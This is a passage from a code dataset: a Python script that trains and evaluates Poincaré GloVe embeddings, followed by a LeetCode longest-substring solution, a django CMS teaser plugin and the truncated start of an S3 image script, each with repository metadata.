First one is the default.\n# This refers to the distance function used in during training.\nSUPPORTED_DIST_FUNCTIONS = {\n \"vanilla\": [\"dist\", \"nn\"],\n \"euclid\": [\"dist-sq\", \"dist\"],\n \"poincare\": [\"dist-sq\", \"dist\", \"cosh-dist\", \"cosh-dist-sq\", \"cosh-dist-pow-*\", \"log-dist-sq\"],\n \"mix-poincare\": [\"dist\", \"dist-sq\", \"cosh-dist-sq\"],\n}\n\nSUPPORTED_COOCC_FUNCTIONS = [\"log\"]\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef precision(eval_result):\n return len(eval_result['correct']) / (len(eval_result['correct']) + len(eval_result['incorrect']))\n\n\ndef compute_poincare_aggregate(model, config):\n \"\"\"\n Precompute the average between the target and the context vector, for Poincare embeddings.\n We take as average the mid point between w and c on the geodesic that connects the 2 points\n (see page 89 in Ungar book).\n \"\"\"\n if config[\"similarity\"] == \"poincare\":\n print(\"precomputing aggregated vectors w+c for Poincare embeddings\")\n gamma_w_sq = 1 / (1 - np.sum(model.wv.vectors * model.wv.vectors, axis=1))\n gamma_c_sq = 1 / (1 - np.sum(model.trainables.syn1neg * model.trainables.syn1neg, axis=1))\n denominator = gamma_w_sq + gamma_c_sq - 1\n agg = (model.wv.vectors * (gamma_w_sq / denominator)[:, None] +\n model.trainables.syn1neg * (gamma_c_sq / denominator)[:, None])\n\n model.wv.vectors = model.wv.moebius_mul_mat(agg, 0.5)\n elif config[\"similarity\"] == \"mix-poincare\":\n print(\"precomputing aggregated vectors w+c for MIX-Poincare embeddings\")\n small_emb_size = int(model.vector_size / model.num_embs)\n for i in range(model.num_embs):\n start = i * small_emb_size\n end = (i + 1) * small_emb_size\n indexes = range(start, end)\n gamma_w_sq = 1 / (1 - np.sum(model.wv.vectors[:, indexes] * model.wv.vectors[:, indexes], axis=1))\n gamma_c_sq = 1 / (1 - np.sum(model.trainables.syn1neg[:, indexes] * model.trainables.syn1neg[:, indexes], axis=1))\n denominator = gamma_w_sq + gamma_c_sq - 1\n agg = (model.wv.vectors[:, indexes] * (gamma_w_sq / denominator)[:, None] +\n model.trainables.syn1neg[:, indexes] * (gamma_c_sq / denominator)[:, None])\n\n model.wv.vectors[:, indexes] = model.wv.moebius_mul_mat(agg, 0.5)\n else:\n print(\"precomputing aggregated vectors w+c for Euclidean embeddings\")\n model.wv.vectors = model.wv.vectors + model.trainables.syn1neg\n\n\ndef split_filename(basename):\n info = basename.split('_')\n return info\n\n\n# Extract information about a model from the filename.\ndef parse_model_filename(model_filename):\n info_dict = {}\n basename = os.path.basename(model_filename)\n info = split_filename(basename)\n\n if \"pairs\" in basename:\n return None, basename\n\n info_dict[\"epochs\"] = int(info[1][2:])\n info_dict[\"emb_size\"] = int(info[2][4:])\n info_dict[\"lr\"] = float(info[3][2:])\n info_dict[\"restrict_vocab\"] = int(info[4][5:])\n info_dict[\"similarity\"] = info[5]\n info_dict[\"with_bias\"] = True if \"_bias\" in basename else False\n info_dict[\"init_near_border\"] = True if \"_border-init\" in basename else False\n\n for s in info:\n if \"OPT\" in s:\n info_dict[\"optimizer\"] = s[3:]\n elif \"COOCCFUNC\" in s:\n info_dict[\"coocc_func\"] = s[9:]\n elif \"DISTFUNC\" in s:\n info_dict[\"dist_func\"] = s[8:]\n elif \"scale\" in s:\n info_dict[\"use_scaling\"] = True\n elif \"NUMEMBS\" in s:\n info_dict[\"num_embs\"] = int(s[7:])\n elif \"logprobs\" in s:\n info_dict[\"use_log_probs\"] = True\n\n if \"optimizer\" not in info_dict:\n info_dict[\"optimizer\"] = 
SUPPORTED_OPTIMIZERS[info_dict[\"similarity\"]][0]\n if \"coocc_func\" not in info_dict:\n info_dict[\"coocc_func\"] = SUPPORTED_COOCC_FUNCTIONS[0]\n if \"dist_func\" not in info_dict:\n info_dict[\"dist_func\"] = SUPPORTED_DIST_FUNCTIONS[info_dict[\"similarity\"]][0]\n if \"use_scaling\" not in info_dict:\n info_dict[\"use_scaling\"] = False\n if \"use_log_probs\" not in info_dict:\n info_dict[\"use_log_probs\"] = False\n\n return info_dict, basename\n\n\n# Class that produces output both to stdout and to an output file. Used during evaluation.\nclass Logger:\n def __init__(self, fout=None):\n self.fout = fout\n\n def log(self, log_str='', end='\\n'):\n logging.info(log_str)\n if self.fout:\n if end == '':\n self.fout.write(log_str)\n else:\n self.fout.write(log_str + end)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--train', dest='train', action='store_true',\n help='Train a new model.')\n parser.add_argument('--eval', dest='train', action='store_false',\n help='Eval an existing model.')\n parser.add_argument('--use_our_format', dest='use_glove_format', action='store_false',\n help='Use our format for reading the vocabulary and the co-occ matrix, instead of the format '\n 'from the original GloVe code.')\n parser.add_argument('--coocc_file', type=str,\n help='Filename which contains the coocc matrix in text format.')\n parser.add_argument('--vocab_file', type=str,\n help='Filename which contains the vocabulary.')\n parser.add_argument('--root', type=str,\n default='~/Documents/Master/Thesis',\n help='Path to the root folder that contains msc_tifreaa, data etc.')\n parser.add_argument('--euclid', type=int, default=0,\n help='Whether it uses Euclidean distance to train the embeddings instead of dot product.')\n parser.add_argument('--poincare', type=int, default=0, help='Whether it uses Poincare embeddings or not.')\n parser.add_argument('--dist_func', type=str, default=\"\",\n help='Distance function used by Poincare model during training.')\n parser.add_argument('--num_embs', type=int, default=0,\n help='The number of small-dimensional planes that will come into the carthesian product of'\n 'manifolds')\n parser.add_argument('--mix', dest='mix', action='store_true',\n help='If true, use a carthesian product of small-dimensional embeddings.')\n parser.add_argument('--nn_config', type=str, default=\"\",\n help='Configuration of the NN used during training.')\n parser.add_argument('--coocc_func', type=str, default=\"\",\n help='Co-occurence function used during training.')\n parser.add_argument('--use_scaling', dest='use_scaling', action='store_true',\n help='Use trainable scaling factor for Poincare GloVe')\n parser.add_argument('--epochs', type=int, default=5, help='Number of epochs')\n parser.add_argument('--restrict_vocab', type=int, default=400000,\n help='Only use the `restrict_vocab` most frequent words')\n parser.add_argument('--size', type=int, default=100, help='Embedding size')\n parser.add_argument('--optimizer', type=str, default='', help='What optimizer to use.')\n parser.add_argument('--lr', type=float, default=0.05, help='Learning rate')\n parser.add_argument('--bias', dest='with_bias', action='store_true', help='Use a model with biases.')\n parser.add_argument('--workers', type=int, default=3, help='Number of concurrent workers.')\n parser.add_argument('--chunksize', type=int, default=1000,\n help='Number of `prange` iterations that each thread processes at a time')\n parser.add_argument('--model_filename', type=str, 
default='', help='Path to saved model.')\n parser.add_argument('--train_log_filename', type=str, default='', help='Path to the training log.')\n parser.add_argument('--cosadd', dest='cosadd', action='store_true',\n help='Use 3COSADD when evaluating word analogy.')\n parser.add_argument('--cosmul', dest='cosmul', action='store_true',\n help='Use 3COSMUL when evaluating word analogy.')\n parser.add_argument('--distadd', dest='distadd', action='store_true',\n help='Use 3DISTADD when evaluating word analogy.')\n parser.add_argument('--hypcosadd', dest='hypcosadd', action='store_true',\n help='Use 3COSADD with gyrocosine when evaluating word analogy.')\n parser.add_argument('--agg_eval', dest='agg_eval', action='store_true',\n help='Use w+c during evaluation, instead of just w. Only works for Poincare embeddings.')\n parser.add_argument('--ctx_eval', dest='ctx_eval', action='store_true',\n help='Use c during evaluation, instead of w.')\n parser.add_argument('--cosine_eval', dest='cosine_eval', action='store_true',\n help='Use cosine distance during evaluation, instead of the Poincare distance.')\n parser.add_argument('--ckpt_emb', dest='ckpt_emb', action='store_true',\n help='Store checkpoints during training with the value of the embedding for certain words')\n parser.add_argument('--init_near_border', dest='init_near_border', action='store_true',\n help='If set, initialize embeddings near the Poincare ball border, instead of near the origin.')\n parser.add_argument('--init_pretrained', dest='init_pretrained', action='store_true',\n help='If set, initialize embeddings from pretrained model.')\n parser.add_argument('--use_log_probs', dest='use_log_probs', action='store_true',\n help='If set, use log-probabilities instead of log-counts during training GloVe.')\n parser.add_argument('--debug', dest='is_debug', action='store_true',\n help='Run model in debug mode')\n parser.set_defaults(train=False, use_glove_format=True, mix=False, with_bias=False, use_scaling=False,\n cosadd=False, cosmul=False, distadd=False, hypcosadd=False, cosine_eval=False,\n agg_eval=False, ctx_eval=False, shift_origin=False, cosine_dist=False, ckpt_emb=False,\n init_near_border=False, init_pretrained=False, use_log_probs=False, is_debug=False)\n args = parser.parse_args()\n\n if args.size > 4 and args.size % 4 != 0:\n raise RuntimeError(\"Choose an embedding size that is a multiple of 4 (it speeds up computation)\")\n\n model = None\n if args.train:\n logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n callbacks = []\n\n emb_type = None\n if args.poincare == 1:\n emb_type = 'poincare'\n elif args.euclid == 1:\n emb_type = 'euclid'\n else:\n emb_type = 'vanilla'\n\n if args.mix:\n emb_type = \"mix-\" + emb_type\n\n coocc_func = args.coocc_func\n if coocc_func == \"\":\n coocc_func = SUPPORTED_COOCC_FUNCTIONS[0] # Set the default\n else:\n if coocc_func not in SUPPORTED_COOCC_FUNCTIONS:\n raise RuntimeError(\"Unsupported co-occurrence function {}\".format(coocc_func))\n\n cosh_dist_pow = 0\n dist_func = args.dist_func\n if emb_type == \"poincare\" or emb_type == \"mix-poincare\" or emb_type == \"euclid\":\n if dist_func == \"\":\n dist_func = SUPPORTED_DIST_FUNCTIONS[emb_type][0] # Set the default\n elif \"cosh-dist-pow\" in dist_func:\n cosh_dist_pow = int(dist_func.rsplit(\"-\", 1)[1])\n else:\n if dist_func not in SUPPORTED_DIST_FUNCTIONS[emb_type]:\n raise RuntimeError(\"Unsupported distance function {} for emb type {}\".format(dist_func, emb_type))\n num_embs = 0\n if \"mix-\" 
in emb_type:\n if args.num_embs == 0:\n raise RuntimeError(\"Invalid number of small embeddings.\")\n num_embs = args.num_embs\n\n if args.num_embs != 0 and \"mix-\" not in emb_type:\n raise RuntimeError(\"num_embs is not supported for this embedding type: {}\".format(emb_type))\n\n nn_config = None\n if dist_func == \"nn\":\n if args.nn_config == \"\":\n raise RuntimeError(\"No NN configuration provided!\")\n nn_config = NNConfig(args.nn_config)\n\n optimizer = args.optimizer\n if optimizer == \"\":\n optimizer = SUPPORTED_OPTIMIZERS[emb_type][0] # Set the default\n else:\n if optimizer not in SUPPORTED_OPTIMIZERS[emb_type]:\n raise RuntimeError(\"Unsupported optimizer {} for embedding type {}\".format(optimizer, emb_type))\n\n filename = MODEL_FILENAME_PATTERN.format(\n \"glove_baseline\" if emb_type == \"vanilla\" else \"geometric_emb\",\n args.epochs, args.size, str(args.lr), args.restrict_vocab, emb_type)\n filename = filename + \"_OPT\" + optimizer\n filename = filename + \"_COOCCFUNC\" + coocc_func\n if emb_type != \"vanilla\":\n filename = filename + \"_DISTFUNC\" + dist_func\n elif emb_type == \"vanilla\" and dist_func == \"nn\":\n filename = filename + \"_DISTFUNCnn\"\n if dist_func == \"nn\":\n filename = filename + \"_NN\" + args.nn_config\n if num_embs:\n filename = filename + \"_NUMEMBS\" + str(num_embs)\n if args.with_bias:\n filename = filename + \"_bias\"\n if args.use_scaling:\n if emb_type != \"poincare\" and emb_type != \"mix-poincare\":\n raise RuntimeError(\"Scaling is only supported for Poincare GloVe embeddings.\")\n filename = filename + \"_scale\"\n if args.use_log_probs:\n filename = filename + \"_logprobs\"\n if args.init_near_border:\n filename = filename + \"_border-init\"\n initialization_config = None\n if args.init_pretrained:\n if emb_type == \"poincare\" and args.size == 100:\n pretrained_model_filename = INITIALIZATION_MODEL_FILENAME[\"100D\"]\n elif emb_type == \"mix-poincare\" and args.size == 100 and num_embs == 50:\n pretrained_model_filename = INITIALIZATION_MODEL_FILENAME[\"50x2D\"]\n elif emb_type == \"vanilla\" and args.size == 100:\n pretrained_model_filename = INITIALIZATION_MODEL_FILENAME[\"vanilla_100D\"]\n else:\n raise RuntimeError(\"Undefined pretrained embedding for this setting.\")\n print(\"Initializing embeddings from pretrained model\", pretrained_model_filename)\n initialization_config = InitializationConfig(\n pretrained_model_filename=os.path.join(args.root, pretrained_model_filename)\n )\n filename = filename + \"_INITpretrained\"\n model_filename = os.path.join(args.root, filename)\n\n ckpt_word_list = None\n if args.ckpt_emb:\n with open(os.path.join(args.root, \"msc_tifreaa/data/google_analogy_vocab.txt\"), \"r\") as f:\n ckpt_word_list = [word.strip() for word in f.readlines()]\n ckpt_filename = \"word_emb_checkpoints/emb_ckpt_\" + os.path.basename(model_filename)\n ckpt_filename = os.path.join(args.root, ckpt_filename)\n callbacks.append(WordEmbCheckpointSaver(ckpt_filename=ckpt_filename))\n\n print(\"[Training] Train new model {} using {}\".format(model_filename, optimizer.upper()), end=\"\")\n if emb_type == \"poincare\":\n print(\" and distance function {}\".format(dist_func.upper()))\n else:\n print(\"\")\n\n model = Glove(\n use_glove_format=args.use_glove_format,\n coocc_file=args.coocc_file,\n vocab_file=args.vocab_file,\n restrict_vocab=args.restrict_vocab,\n num_workers=args.workers,\n chunksize=args.chunksize,\n epochs=args.epochs,\n euclid=args.euclid,\n poincare=args.poincare,\n with_bias=args.with_bias,\n 
use_log_probs=args.use_log_probs,\n dist_func=dist_func,\n cosh_dist_pow=cosh_dist_pow,\n num_embs=num_embs,\n nn_config=nn_config,\n coocc_func=coocc_func,\n use_scaling=args.use_scaling,\n lr=args.lr,\n optimizer=optimizer,\n ckpt_word_list=ckpt_word_list,\n init_near_border=args.init_near_border,\n init_pretrained_config=initialization_config,\n callbacks=callbacks,\n vector_size=args.size,\n vector_dtype=REAL)\n\n if args.use_scaling:\n print(\"Final scaling factor is {}\".format(model.scaling_factor))\n\n if optimizer == \"wfullrsgd\" or optimizer == \"fullrsgd\":\n logging.info(\"\")\n logging.info(\"Number of projections back to the Poincare ball: {}\".format(model.num_projections))\n\n # Cleanup model.\n model.cleanup()\n\n # Save model.\n print(\"Saving model to {}\".format(model_filename))\n with open(model_filename, \"wb\") as f:\n model.save(f)\n else:\n model = Glove.load(args.model_filename)\n wv = model.wv\n wv.trainables = model.trainables\n\n # XXX: uncomment to evaluate the model with the scaled and projected pretrained embeddings used for initialization\n # wv.vectors = model.trainables.initialization_config.init_vectors\n\n directory = os.path.join(args.root, \"eval_logs\")\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n # Extract model info from the model filename.\n config, basename = parse_model_filename(args.model_filename)\n\n # Ugly fix. To ensure backward compatibilty with an earlier version that used a different convention for the filename.\n if config is None:\n config = {}\n config[\"similarity\"] = \"poincare\" if (\"poincare\" in basename) else (\"euclid\" if (\"euclid\" in basename) else \"vanilla\")\n\n analogy_type = None\n if args.cosadd:\n analogy_type = \"cosadd\"\n elif args.cosmul:\n analogy_type = \"cosmul\"\n elif args.distadd:\n analogy_type = \"distadd\"\n elif args.hypcosadd:\n analogy_type = \"hypcosadd\"\n elif config[\"similarity\"] == \"poincare\":\n if args.cosine_eval:\n analogy_type = \"hyp_pt-eucl-cos-dist\"\n else:\n analogy_type = \"hyp_pt\"\n elif config[\"similarity\"] == \"mix-poincare\":\n if args.cosine_eval:\n analogy_type = \"mix-hyp_pt-eucl-cos-dist\"\n else:\n analogy_type = \"mix-hyp_pt\"\n else:\n analogy_type = \"cosadd\" # The default for dot product and Euclidean embeddings is 3COSADD\n\n if config[\"similarity\"] == \"mix-poincare\" and \"num_embs\" not in config:\n raise RuntimeError(\"Mix Poincare embeddings should have a valid number of small embeddings\")\n\n if args.agg_eval:\n compute_poincare_aggregate(model, config)\n\n if args.ctx_eval:\n model.wv.vectors = model.trainables.syn1neg\n\n if args.shift_origin:\n left_offset = -np.average(model.wv.vectors, axis=0)\n # right_offset = -np.average(model.wv.vectors, axis=0)\n left_offset_mat = np.tile(left_offset.reshape(1, -1), (model.wv.vectors.shape[0], 1))\n # right_offset_mat = np.tile(right_offset.reshape(1, -1), (model.wv.vectors.shape[0], 1))\n\n model.wv.vectors = gensim.models.keyedvectors.PoincareWordEmbeddingsKeyedVectors.moebius_add_mat(\n left_offset_mat, model.wv.vectors)\n # model.wv.vectors = gensim.models.keyedvectors.PoincareWordEmbeddingsKeyedVectors.moebius_add_mat(\n # model.wv.vectors, right_offset_mat)\n\n if config[\"similarity\"] == \"poincare\" or config[\"similarity\"] == \"mix-poincare\":\n if args.cosine_eval:\n model.wv.use_poincare_distance = False\n model.wv.init_sims()\n else:\n model.wv.use_poincare_distance = True\n\n # Create name for file that will store the logs.\n eval_log_filename = \"eval_logs/eval_\" + 
basename.split(\"_\", 1)[1] + \"_\" + analogy_type + \\\n (\"_agg\" if args.agg_eval else (\"_ctx\" if args.ctx_eval else \"\"))\n # eval_log_filename = eval_log_filename + (\"_cosdist\" if config[\"similarity\"] == \"poincare\" and args.cosine_eval else \"\")\n eval_log_filename = os.path.join(args.root, eval_log_filename)\n feval = None\n if args.restrict_vocab != 0:\n feval = open(eval_log_filename, \"w+\")\n logger = Logger(feval)\n else:\n # Don't save the output to file if we are not running the word analogy benchmarks.\n logger = Logger()\n\n if len(config) > 1:\n logger.log('MODEL: (Epochs, {}), (Emb size, {}), (LR, {}), (Optimizer, {}), (With bias, {}), (Similarity, {}), (Dist. func. {}), (Scaling, {}), (Use Log-Probs, {}), (Restrict vocab, {})'.format(\n config[\"epochs\"], config[\"emb_size\"], config[\"lr\"], config[\"optimizer\"].upper(), \"yes\" if config[\"with_bias\"] else \"no\",\n config[\"similarity\"], config[\"dist_func\"].upper(), config[\"use_scaling\"], config[\"use_log_probs\"],\n config[\"restrict_vocab\"]\n ))\n\n if args.restrict_vocab != 0:\n logger.log('EVALUATION: (Analogy type, {}), (Vectors used, {})'.format(\n analogy_type, (\"W+C\" if args.agg_eval else (\"C\" if args.ctx_eval else \"W\"))))\n else:\n logger.log()\n\n sim_debug_file = None\n if args.is_debug:\n sim_debug_file = os.path.join(args.root, \"eval_logs/debug_similarity.csv\")\n hyperlex_debug_file = None\n if args.is_debug:\n hyperlex_debug_file = os.path.join(args.root, \"eval_logs/debug_hyperlex.csv\")\n\n # logger.log(\"========= Various statistics =========\")\n # norms_distribution(model)\n # wordnet_level_rank_vector_norm_correlation(model, args.root)\n\n logger.log(\"========= Similarity evaluation =========\")\n pearson, spearman, ratio = wv.evaluate_word_pairs(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'rare_word.txt'),\n dummy4unknown=False,\n restrict_vocab=args.restrict_vocab\n )\n logger.log(\"Stanford Rare World: {:.4f} {:.4f} {:.4f}\".format(pearson[0], spearman[0], ratio))\n pearson, spearman, ratio = wv.evaluate_word_pairs(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'wordsim353.tsv'),\n dummy4unknown=False,\n debug_file=sim_debug_file,\n restrict_vocab=args.restrict_vocab\n )\n logger.log(\"WordSim353: {:.4f} {:.4f} {:.4f}\".format(pearson[0], spearman[0], ratio))\n pearson, spearman, ratio = wv.evaluate_word_pairs(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'simlex999.txt'),\n dummy4unknown=False,\n restrict_vocab=args.restrict_vocab\n )\n logger.log(\"SimLex999: {:.4f} {:.4f} {:.4f}\".format(pearson[0], spearman[0], ratio))\n pearson, spearman, ratio = wv.evaluate_word_pairs(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'mturk771.tsv'),\n dummy4unknown=False,\n restrict_vocab=args.restrict_vocab\n )\n logger.log(\"MTurk771: {:.4f} {:.4f} {:.4f}\".format(pearson[0], spearman[0], ratio))\n pearson, spearman, ratio = wv.evaluate_word_pairs(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'simverb3500.tsv'),\n dummy4unknown=False,\n restrict_vocab=args.restrict_vocab\n )\n logger.log(\"SimVerb3500: {:.4f} {:.4f} {:.4f}\".format(pearson[0], spearman[0], ratio))\n pearson, spearman, ratio = wv.evaluate_word_pairs(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'men_dataset.tsv'),\n dummy4unknown=False,\n restrict_vocab=args.restrict_vocab\n )\n logger.log(\"MEN: {:.4f} {:.4f} {:.4f}\".format(pearson[0], spearman[0], ratio))\n pearson, spearman, ratio = 
wv.evaluate_word_pairs(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'MC-30.tsv'),\n dummy4unknown=False,\n restrict_vocab=args.restrict_vocab\n )\n logger.log(\"MC: {:.4f} {:.4f} {:.4f}\".format(pearson[0], spearman[0], ratio))\n pearson, spearman, ratio = wv.evaluate_word_pairs(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'RG-65.tsv'),\n dummy4unknown=False,\n restrict_vocab=args.restrict_vocab\n )\n logger.log(\"RG: {:.4f} {:.4f} {:.4f}\".format(pearson[0], spearman[0], ratio))\n pearson, spearman, ratio = wv.evaluate_word_pairs(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'YP-130.tsv'),\n dummy4unknown=False,\n restrict_vocab=args.restrict_vocab\n )\n logger.log(\"YP: {:.4f} {:.4f} {:.4f}\".format(pearson[0], spearman[0], ratio))\n\n if args.restrict_vocab != 0:\n logger.log(\"=========== Analogy evaluation ==========\")\n most_similar = None\n if analogy_type == \"cosadd\" or analogy_type == \"hypcosadd\":\n most_similar = gensim.models.keyedvectors.VanillaWordEmbeddingsKeyedVectors.batch_most_similar_analogy\n elif analogy_type == \"cosmul\":\n most_similar = gensim.models.keyedvectors.VanillaWordEmbeddingsKeyedVectors.batch_most_similar_cosmul_analogy\n elif analogy_type == \"hyp_pt\" or analogy_type == \"hyp_pt-eucl-cos-dist\":\n most_similar = gensim.models.keyedvectors.PoincareWordEmbeddingsKeyedVectors.batch_most_similar_hyperbolic_analogy\n elif analogy_type == \"mix-hyp_pt\" or analogy_type == \"mix-hyp_pt-eucl-cos-dist\":\n most_similar = gensim.models.keyedvectors.MixPoincareWordEmbeddingsKeyedVectors.batch_most_similar_mix_hyperbolic_analogy\n elif analogy_type == \"distadd\":\n most_similar = gensim.models.keyedvectors.PoincareWordEmbeddingsKeyedVectors.batch_most_similar_3distadd_analogy\n else:\n raise RuntimeError(\"Unknown analogy type.\")\n\n print(config[\"similarity\"], analogy_type)\n if (config[\"similarity\"] == \"mix-poincare\" or config[\"similarity\"] == 'poincare') and (analogy_type == \"cosadd\" or analogy_type == \"cosmul\"):\n model.wv.vectors_norm = None\n gensim.models.keyedvectors.WordEmbeddingsKeyedVectors.init_sims(model.wv)\n if config[\"similarity\"] == \"poincare\" and args.cosine_eval:\n model.wv.vectors_norm = None\n gensim.models.keyedvectors.WordEmbeddingsKeyedVectors.init_sims(model.wv)\n\n start = time.time()\n analogy_eval = wv.accuracy(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'questions-words.txt'),\n restrict_vocab=args.restrict_vocab,\n most_similar=most_similar,\n debug=args.is_debug)\n # Now, instead of adding the correct/incorrect words to a list, I am just counting the number of correct/incorrect answers.\n logger.log(\"Semantic Google: {} {} {:.2f} {:.4f} {:.4f}\".format(analogy_eval[-3]['correct'][0],\n analogy_eval[-3]['correct'][0] + analogy_eval[-3]['incorrect'][0],\n analogy_eval[-3]['t_argmax'][0],\n analogy_eval[-3]['correct'][0] / (analogy_eval[-3]['correct'][0] + analogy_eval[-3]['incorrect'][0]),\n analogy_eval[-3]['correct'][0] / SEM_GOOGLE_SIZE))\n logger.log(\"Syntactic Google: {} {} {:.2f} {:.4f} {:.4f}\".format(analogy_eval[-2]['correct'][0],\n analogy_eval[-2]['correct'][0] + analogy_eval[-2]['incorrect'][0],\n analogy_eval[-2]['t_argmax'][0],\n analogy_eval[-2]['correct'][0] / (analogy_eval[-2]['correct'][0] + analogy_eval[-2]['incorrect'][0]),\n analogy_eval[-2]['correct'][0] / SYN_GOOGLE_SIZE))\n logger.log(\"Google: {} {} {:.2f} {:.4f} {:.4f}\".format(analogy_eval[-1]['correct'][0],\n analogy_eval[-1]['correct'][0] + 
analogy_eval[-1]['incorrect'][0],\n analogy_eval[-1]['t_argmax'][0],\n analogy_eval[-1]['correct'][0] / (analogy_eval[-1]['correct'][0] + analogy_eval[-1]['incorrect'][0]),\n analogy_eval[-1]['correct'][0] / GOOGLE_SIZE))\n\n if not args.is_debug:\n analogy_eval = wv.accuracy(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data/', 'msr_word_relationship.processed'),\n restrict_vocab=args.restrict_vocab,\n most_similar=most_similar)\n # Now, instead of adding the correct/incorrect words to a list, I am just counting the number of correct/incorrect answers.\n logger.log(\"Microsoft: {} {} {:.2f} {:.4f} {:.4f}\".format(analogy_eval[-1]['correct'][0],\n analogy_eval[-1]['correct'][0] + analogy_eval[-1]['incorrect'][0],\n analogy_eval[-1]['t_argmax'][0],\n analogy_eval[-1]['correct'][0] / (analogy_eval[-1]['correct'][0] + analogy_eval[-1]['incorrect'][0]),\n analogy_eval[-1]['correct'][0] / MSR_SIZE))\n logging.info(\"\")\n logging.info(\"Analogy task took {} seconds to perform.\".format(time.time() - start))\n if feval:\n feval.close()\n","repo_name":"alex-tifrea/poincare_glove","sub_path":"glove_code/scripts/glove_main.py","file_name":"glove_main.py","file_ext":"py","file_size_in_byte":32472,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"32"} +{"seq_id":"32970222407","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n \n # Sliding window\n charSet = set()\n \n left = 0\n res = 0\n \n for right in range(len(s)):\n # While the character is in the set\n while s[right] in charSet:\n # Delete the char from the set and shift the left pointer\n charSet.remove(s[left])\n left += 1\n # If the char is not in the set then add it\n charSet.add(s[right])\n # right - next + 1 (right index minus left index + 1 (arrays start at 0)) to get the size of the window (longest length)\n res = max(res, right - left + 1)\n return res\n ","repo_name":"CelesTech03/Leetcode-Grind","sub_path":"0003-longest-substring-without-repeating-characters/0003-longest-substring-without-repeating-characters.py","file_name":"0003-longest-substring-without-repeating-characters.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34553865847","text":"from cms.plugin_pool import plugin_pool\nfrom cms.plugin_base import CMSPluginBase\nfrom django.utils.translation import ugettext_lazy as _\nimport models\nfrom django.db import models as djmodels\nfrom django.conf import settings\n\nfrom djangocms_text_ckeditor.widgets import TextEditorWidget\n\ntry:\n from settings import TEASER_PLUGIN_TEMPLATES\nexcept:\n TEASER_PLUGIN_TEMPLATES = (\n ('intro_wiget.html', 'Slider List'),\n )\n\nclass FilerTeaserPlugin(CMSPluginBase):\n \"\"\"\n TODO: this plugin is becoming very similar to the image plugin... 
code\n should be re-used somehow.\n \"\"\"\n module = 'Filer'\n model = models.FilerTeaser\n name = _(\"Teaser\")\n render_template = \"cmsplugin_filer_teaser/teaser.html\"\n\n\n formfield_overrides = {\n djmodels.TextField : {'widget': TextEditorWidget}\n }\n\n def _get_thumbnail_options(self, context, instance):\n \"\"\"\n Return the size and options of the thumbnail that should be inserted\n \"\"\"\n width, height = None, None\n subject_location = False\n placeholder_width = context.get('width', None)\n placeholder_height = context.get('height', None)\n if instance.use_autoscale and placeholder_width:\n # use the placeholder width as a hint for sizing\n width = int(placeholder_width)\n if instance.use_autoscale and placeholder_height:\n height = int(placeholder_height)\n elif instance.width:\n width = instance.width\n if instance.height:\n height = instance.height\n if instance.image:\n if instance.image.subject_location:\n subject_location = instance.image.subject_location\n if not height and width:\n # height was not externally defined: use ratio to scale it by the width\n height = int( float(width)*float(instance.image.height)/float(instance.image.width) )\n if not width and height:\n # width was not externally defined: use ratio to scale it by the height\n width = int( float(height)*float(instance.image.width)/float(instance.image.height) )\n if not width:\n # width is still not defined. fallback the actual image width\n width = instance.image.width\n if not height:\n # height is still not defined. fallback the actual image height\n height = instance.image.height\n return {'size': (width, height),\n 'subject_location': subject_location}\n\n def get_thumbnail(self, context, instance):\n if instance.image:\n return instance.image.image.file.get_thumbnail(self._get_thumbnail_options(context, instance))\n\n def render(self, context, instance, placeholder):\n options = self._get_thumbnail_options(context, instance)\n context.update({\n 'instance': instance,\n 'link': instance.link,\n 'opts': options,\n 'size': options.get('size',None),\n 'placeholder': placeholder\n })\n return context\n\nclass FilerTeaserListPlugin(CMSPluginBase):\n\n model = models.FilerTeaserList\n module = 'Filer'\n name = _(\"TeaserList\")\n render_template = TEASER_PLUGIN_TEMPLATES[0][0]\n filter_horizontal = ('filer_teasers',)\n\n formfield_overrides = {\n djmodels.TextField : {'widget': TextEditorWidget}\n }\n\n def render(self, context, instance, placeholder):\n if instance and instance.template:\n self.render_template = instance.template\n context.update({\n 'object':instance, \n 'placeholder':placeholder,\n 'teasers':instance.filer_teasers.all()\n })\n return context\n\nplugin_pool.register_plugin(FilerTeaserPlugin)\nplugin_pool.register_plugin(FilerTeaserListPlugin)\n","repo_name":"Alexascet/cmsplugin-filer-teaser","sub_path":"cmsplugin_filer_teaser/cms_plugins.py","file_name":"cms_plugins.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2730286214","text":"import json\nfrom PIL import Image\nimport boto3\nimport os\n\ns3 = boto3.resource('s3')\ns3_bucket_lookup = {\"multitenant\": \"gigwalk-multitenant-api-server\", \"beta\": \"gigwalk-beta-api-server\", \"stage\": \"gigwalk-stage-app-api-server\", \"jp_prod\": \"gigwalk-japan-api-server\", \"jp_stage\": \"gigwalk-jp-staging-api-server\", \"jp_partner\": \"gigwalk-partner-jp-api-server\", \"csmk_partner\": \"gigwalk-uu-partner\", \"csmk_partner_dev\": 
